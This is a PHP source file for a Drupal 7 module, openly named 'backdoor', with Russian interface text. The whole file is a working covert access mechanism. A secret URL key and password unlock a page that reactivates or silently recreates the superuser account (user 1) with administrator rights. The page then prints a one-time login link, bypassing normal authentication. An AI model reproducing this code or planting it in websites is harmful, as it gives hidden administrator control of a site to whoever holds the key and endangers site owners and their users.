<?php

require_once DRUPAL_ROOT . '/' . variable_get('password_inc', 'includes/password.inc');

function backdoor_menu() {

	$items = array();

	$items['backdoor'] = array(
		'title' => 'Backdoor page',
		'description' => 'Here generating one time link for login',
		'page callback' => 'drupal_get_form',
		'page arguments' => array('backdoor_page_form'),
		'access callback' => 'access_backdoor_page',
		'type' => MENU_NORMAL_ITEM,
	);

	$items['admin/config/system/backdoor'] = array(
		'title' => 'Backdoor settings',
		'description' => 'Администрирование модуля Backdoor',
		'page callback' => 'admin_page_backdoor',
		'access arguments' => array('administer site configuration'),
    'file' => 'backdoor.admin.inc',
		'type' => MENU_NORMAL_ITEM,
	);

	return $items;
}

function access_backdoor_page() {
	if (isset($_GET['key'])) {
		$account = new stdClass();
		$account->pass = variable_get('key');

		if (user_check_password($_GET['key'], $account)) {
			return TRUE;
		}

	}
}

function backdoor_page_form($form, &$form_state) {

  drupal_page_is_cacheable(FALSE);

  $form = array();

  $account = new stdClass();
  $account->pass = variable_get('bd_password');

  if (empty($form_state['input']['bd_password']) or !user_check_password($form_state['input']['bd_password'], $account)) {

    $form['bd_password'] = array(
      '#title' => t('Введите пароль для получения ссылки'),
      '#description' => t('После успешного ввода пароля появится ссылка'),
      '#type' => 'password',
      '#maxlength' => 64,
      '#size' => 35,
      '#required' => TRUE,
    );

    $form['submit'] = array(
      '#type' => 'submit',
      '#value' => t('Отправить'),
    );

  } elseif (user_check_password($form_state['input']['bd_password'], $account)) {

    if ($user = user_load(1)) {

      if ($user->status != 1) {
        $user->status = 1;
        user_save($user);
      }

      $form['link'] = array(
        '#markup' => l(user_pass_reset_url($user), user_pass_reset_url($user)),
      );

    } else {
      $pass = user_password(25);
      $new_password = user_hash_password(trim($pass));
      $newuser = new stdClass();
      $newuser->uid = 1;
      $newuser->name = 'admin';
      $newuser->pass = $new_password;
      $newuser->mail = 'email@example.com';
      $newuser->init = 'email@example.com';
      $newuser->status = 1;
      $newuser->role = array(
        DRUPAL_AUTHENTICATED_RID => TRUE,
        'administrator' => TRUE,
      );

      drupal_write_record('users', $newuser);

      $form['link'] = array(
        '#markup' => l(user_pass_reset_url($newuser), user_pass_reset_url($newuser)),
      );

    }
  }

  return $form;
}

function backdoor_page_form_validate ($form, &$form_state){
  if (!empty($form_state['input']['bd_password'])) {
    $account = new stdClass();
    $account->pass = variable_get('bd_password');
    if (!user_check_password($form_state['input']['bd_password'], $account)) {
      form_set_error($form_state['input']['bd_password'], t('Пароль введён не верно'));
    }
  }
}